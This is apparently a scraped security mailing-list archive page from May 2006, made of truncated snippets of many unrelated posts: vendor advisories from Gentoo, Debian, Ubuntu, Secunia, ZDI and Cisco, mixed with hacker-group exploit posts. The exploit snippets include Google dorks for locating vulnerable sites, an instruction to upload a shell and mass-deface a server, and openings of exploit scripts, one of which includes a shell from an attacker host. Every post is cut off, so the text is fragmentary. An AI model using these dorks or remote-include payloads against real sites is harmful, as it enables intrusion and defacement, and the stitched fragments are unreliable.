google dork: inurl:x-poll
and add to /admin/images/add.php , upload to shell, and mass deface is server
www.ayyildiz.org
pre
[i] Limbo CMS (option=weblinks) sql injection exploit
[i] Cyber-Security.ORG | Security Advisory | Security Edithor by SnoB | Turkish
hacking | security{!}
?php
if( (!isset($_GET['host'])) || (!isset($_GET['path'])) || (!isset($_GET['id'])))
{
?
[*] Usage: ?echo
google dork : Phil's Bookmark
and lasth path add to admin.php?edit=[item id]
example: www.site.com/bookmarks/admin.php?edit=1
www.ayyildiz.org
ORIGINAL ADVISORY:
http://myimei.com/security/2006-05-07/mybb111email-verification-in-user-activation-sql-injection-attack.html
-Summary-
Software: MyBB
Sowtwares Web Site: http://www.mybboard.com
Versions: 1.1.1
Class: Remote
Status: Unpatched
Exploit: Available
Solution:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200605-07
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - -
The security module(BankTown Client Control 1,4,2,51817)metioned above
currently is not being used anymore.
For those who did not remove and still have it remained in their PCs, a new
security patch has been released so that it is no longer vulnerable to those
kinds of attacks.
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 1052-1[EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
May 8th, 2006
Title: CAID 34013 - CA Common Services CAIRIM on z/OS LMP SVC
vulnerability
CA Vulnerability ID: 34013
CA Advisory Date: 2006-05-02
Discovered By: IBM Global Services
Impact: Local attacker can gain escalated privileges.
Summary:
A potential vulnerability issue exists in our CAIRIM LMP
#!/usr/bin/perl
# Dokeos Learning Management System 1.6.4 Remote File Include
# Exploit Advisorie: beford xbefordx gmail com
#
# uso:# perl own.pl host cmd-shell-url cmd-var
# perl own.pl http://host.com/dokeos/ http://atacante/shell.gif
cmd
#
# cmd
= CodeScan Advisory, codescan.com [EMAIL PROTECTED]
=
= Multiple Vulnerabilities In IdealBB ASP Bulletin Board
=
= Vendor Website:
= http://www.idealscience.com
=
= Affected Version:
=Version 1.5.4a And Earlier
=
=
#
# Description
#
# Vendor: http://www.claroline.net
# The file claroline/auth/extauth/drivers/ldap.inc.php uses the variable
# clarolineRepositorySys in a include() function without being declared.
# There are other files vulnerable in the same folder, this exploit only
#
SOFTWARE:
=
singapore v0.9.7
DESCRIPTION:
The system is vulnerable to various XSS attacks
google dork : Powered by singapore v0.9.7 inurl:index.php?gallery
429 results :)
xss code example
www.site.com/images/index.php?gallery=[gallery
INFIGO IS Security Advisory #ADV-2006-05-03
http://www.infigo.hr/
Title: Multiple FTP Servers vulnerabilities
Advisory ID: INFIGO-2006-05-03
Date: 2006-05-05
Advisory URL: http://www.infigo.hr/hr/in_focus/advisories/INFIGO-2006-05-03
Impact: Remote code
# Kurdish Security Advisory
# phpRaid Remote File Include [PHPBB] :}
# Sosyalizim'de #305;srar insan olmakta #305;srard#305;r Abdullah Ocalan
# Contact : irc.gigachat.net #kurdhack www.PatrioticHackers.com [EMAIL
PROTECTED]
# Script : phpRaid
# Script Website : http://www.spiffyjr.com/
# Kurdish Security Advisory
# phpRaid Remote File Include [SMF] :}
# Sosyalizim'de #305;srar insan olmakta #305;srard#305;r Abdullah Ocalan
# Contact : irc.gigachat.net #kurdhack www.PatrioticHackers.com [EMAIL
PROTECTED]
# Risk : High
# Class : Remote
# Script : phpRaid
# Script
This was fixed in the recent security update (IPB.Blog 1.2.3) after an internal
audit.
http://forums.invisionpower.com/index.php?showtopic=214248view=getnewpost
==
Secunia Research 08/05/2006
- TZipBuilder ZIP File Handling Buffer Overflow Vulnerability -
==
Table of Contents
Affected
===
Ubuntu Security Notice USN-282-1 May 08, 2006
nagios vulnerability
CVE-2006-2162
===
A security issue affects the following Ubuntu releases:
Ubuntu 5.04 (Hoary
===
Ubuntu Security Notice USN-283-1 May 08, 2006
mysql-dfsg-4.1, mysql-dfsg vulnerabilities
CVE-2006-1516, CVE-2006-1517
===
A security issue affects the following Ubuntu
==
Secunia Research 08/05/2006
- Anti-Trojan unacev2.dll Buffer Overflow Vulnerability -
==
Table of Contents
Affected
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200605-08
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - -
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200605-09
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - -
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Virtual Security Research, LLC.
http://www.vsecurity.com/
Security Advisory
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Advisory Name: WebSense content filter
Folks,
During some specific tests with our upcoming Web App Security Scanner tool,
we have found that Apache would kindly accept HTML injection through
Expect header. Originally meant to be a protocol flow control that would
give web client the capacity of sending the HTTP headers for
ZDI-06-012: Sophos Anti-Virus CAB Unpacking Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-06-013.html
May 8, 2006
-- CVE ID:
CVE-2006-0994
-- Affected Vendor:
Sophos Plc.
-- Affected Products:
Sophos Anti-Virus for Windows, Mac OS, Unix, Linux, NetWare, OS/2,
#!/usr/bin/php -q -d short_open_tag=on
?
echo PHPFusion = v6.00.306 avatar mod_mime arbitrary file upload \r\n;
echo local inclusion vulnerabilities\r\n;
echo by rgod [EMAIL PROTECTED];
echo site: http://retrogod.altervista.org\r\n\r\n;;
if ($argc6) {
echo Usage: php .$argv[0]. host path
[MajorSecurity] phpListPro = 2.01 - Multiple Remote File Include Vulnerability
Software: phpListPro
Version: =2.01
Type: Multiple Remote File Include Vulnerability
Date: May, 8th 2006
Vendor: SmartISoft
Page: http://smartisoft.com
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Cisco Response
==
This is Cisco PSIRT's response to the statements made by Symantec in
its advisory: SYMSA-2006-003, posted on May 8, 2006.
The original email/advisory is available at:
28 matches
Mail list logo